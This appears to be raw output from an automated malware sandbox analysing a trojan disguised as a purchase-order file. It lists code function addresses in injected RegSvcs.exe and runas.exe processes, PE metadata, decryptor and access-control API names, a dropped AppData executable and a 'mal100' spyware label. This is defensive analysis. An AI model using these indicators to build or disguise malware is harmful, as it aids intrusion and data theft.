Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A2840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015AA840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015CE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015868B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0165AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01656BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0159EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015AAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0163CD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0159ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015B8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01590CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01640CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01614F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01642F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015C0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015E2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01592FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0161EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A0E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0165EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0165EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015B2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0165CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0166B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0158F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015D516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015AB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0165F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016570E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0164F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0158D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0165132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015E739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016412ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015BB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015BD2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01657571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016695C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0163D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01591460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0165F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0165F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015E5630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016516CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015BB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01635910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0160D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0165FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01615BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015DDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015BFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01613A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01657A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0165FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0164DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01641AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0163DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015E5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01657D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01651D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015BFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01619C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0165FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0165FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01563FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01563FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A1F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0165FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A9EB0
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe Code function: 9_2_026E4218
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe Code function: 9_2_026E6F92
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe Code function: 9_2_026ED4A4
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe Code function: 9_2_04CCC7E4
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe Code function: 9_2_04CC1F5F
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe Code function: 9_2_04CC1F60
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe Code function: 9_2_04CCE9A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00F06000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EB0100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00F402C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EC0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EDC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EBC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EC0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EE4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EEE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EA68B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EF8890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00ECA840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EC2840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EC29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00ED6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EBEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EB0CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EC0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EBADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EC8DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00ED8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00ECED7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00ECAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00ED2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EC0E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EB2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00F3EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00F34F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00F02F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EE0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00ECB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EF516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EAF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EDD2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EDB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EC52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EC33F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EAD34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00F074E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EC3497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EB1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00ECB730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EC38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00F2D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EC5990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EC9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EDB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00F33A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00F35BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EFDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EDFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00F39C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00ED9C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EDFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EC3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EC9EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00EC1F92
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045A2446
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04594420
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_0459E4F6
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044F0535
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045B0591
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_0450C6E0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04514750
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044F0770
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044EC7C0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04582000
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04578158
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_0458A118
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044E0100
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045A81CC
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045B01AA
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045A41A2
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04590274
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045702C0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045AA352
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045B03E6
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044FE3F0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044F0C00
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044E0CF2
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04590CB5
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_0458CD1F
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044FAD00
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044EADE0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04508DBF
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044F0E59
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045AEE26
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045AEEDB
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04502E90
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045ACE93
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04564F40
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04510F30
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04592F30
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04532F28
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044E2FC8
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_0456EFA0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044F2840
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044FA840
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_0451E8F0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044D68B8
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04506962
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044F29A0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045BA9A6
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044EEA80
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045AAB40
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045A6BD7
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044E1460
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045AF43F
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045A7571
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045B95C3
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_0458D5B0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04535630
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045A16CC
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045AF7B0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044F70C0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_0459F0CC
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045A70E9
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045AF0E0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045BB16B
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_0452516C
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044DF172
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044FB1B0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_0450B2C0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_0450D2F0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045912ED
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044F52A0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044DD34C
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045A132D
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_0453739A
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04569C32
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045AFCF2
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045A1D5A
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044F3D40
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045A7D73
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_0450FDC0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044F9EB0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045AFF09
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044F1F92
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045AFFB1
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_0455D800
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044F38E0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_0450B950
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_044F9950
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04585910
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045AFA49
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045A7A46
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04563A6C
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_0459DAC6
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04535AA0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_0458DAAC
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04591AA3
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_045AFB76
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04565BF0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_0452DBF9
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_0450FB80
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_00501FE0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_004FCED0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_004FB0E0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_004FD0F0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_004FB225
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_004FB230
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_005056B0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_00503869
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_005038B0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_0051BDA0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_0430E74C
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0430E3B718_2_0430E3B7
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_0430D81818_2_0430D818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 00F07E54 appears 96 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0158B970 appears 262 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 015E7E54 appears 107 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0161F290 appears 103 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0160EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 00F2EA12 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 015D5130 appears 58 times
Source: C:\Windows\SysWOW64\runas.exe | Code function: String function: 0455EA12 appears 86 times
Source: C:\Windows\SysWOW64\runas.exe | Code function: String function: 04525130 appears 58 times
Source: C:\Windows\SysWOW64\runas.exe | Code function: String function: 0456F290 appears 103 times
Source: C:\Windows\SysWOW64\runas.exe | Code function: String function: 044DB970 appears 262 times
Source: C:\Windows\SysWOW64\runas.exe | Code function: String function: 04537E54 appears 107 times
Source: Pre Alert PO TVKJEANSA00967.bat.exe | Static PE information: invalid certificate
Source: Pre Alert PO TVKJEANSA00967.bat.exe | Binary or memory string: OriginalFilename vs Pre Alert PO TVKJEANSA00967.bat.exe
Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1808502142.0000000003ED5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs Pre Alert PO TVKJEANSA00967.bat.exe
Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1808502142.0000000003ED5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs Pre Alert PO TVKJEANSA00967.bat.exe
Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812017169.00000000056C0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs Pre Alert PO TVKJEANSA00967.bat.exe
Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1808502142.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs Pre Alert PO TVKJEANSA00967.bat.exe
Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1813982353.0000000007710000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs Pre Alert PO TVKJEANSA00967.bat.exe
Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1794907046.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Pre Alert PO TVKJEANSA00967.bat.exe
Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000000.1692196796.00000000009A2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameQIoK.exe: vs Pre Alert PO TVKJEANSA00967.bat.exe
Source: Pre Alert PO TVKJEANSA00967.bat.exe | Binary or memory string: OriginalFilenameQIoK.exe: vs Pre Alert PO TVKJEANSA00967.bat.exe
Source: Pre Alert PO TVKJEANSA00967.bat.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Pre Alert PO TVKJEANSA00967.bat.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: STiokuWkiGFJ.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.56c0000.4.raw.unpack, id.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3ed5828.1.raw.unpack, id.cs | Cryptographic APIs: 'CreateDecryptor'
Source: Pre Alert PO TVKJEANSA00967.bat.exe, Factory.cs | Task registration methods: 'CreateFileTaskExtractor', 'CreateTaskReportGererator'
Source: STiokuWkiGFJ.exe.0.dr, Factory.cs | Task registration methods: 'CreateFileTaskExtractor', 'CreateTaskReportGererator'
Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, qRBbpxao885KWSeQTv.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, yWL2O9p29XpAZecQVf.cs | Security API names: _0020.SetAccessControl
Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, yWL2O9p29XpAZecQVf.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, yWL2O9p29XpAZecQVf.cs | Security API names: _0020.AddAccessRule
Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, qRBbpxao885KWSeQTv.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, yWL2O9p29XpAZecQVf.cs | Security API names: _0020.SetAccessControl
Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, yWL2O9p29XpAZecQVf.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, yWL2O9p29XpAZecQVf.cs | Security API names: _0020.AddAccessRule
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@23/16@5/5
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | File created: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe
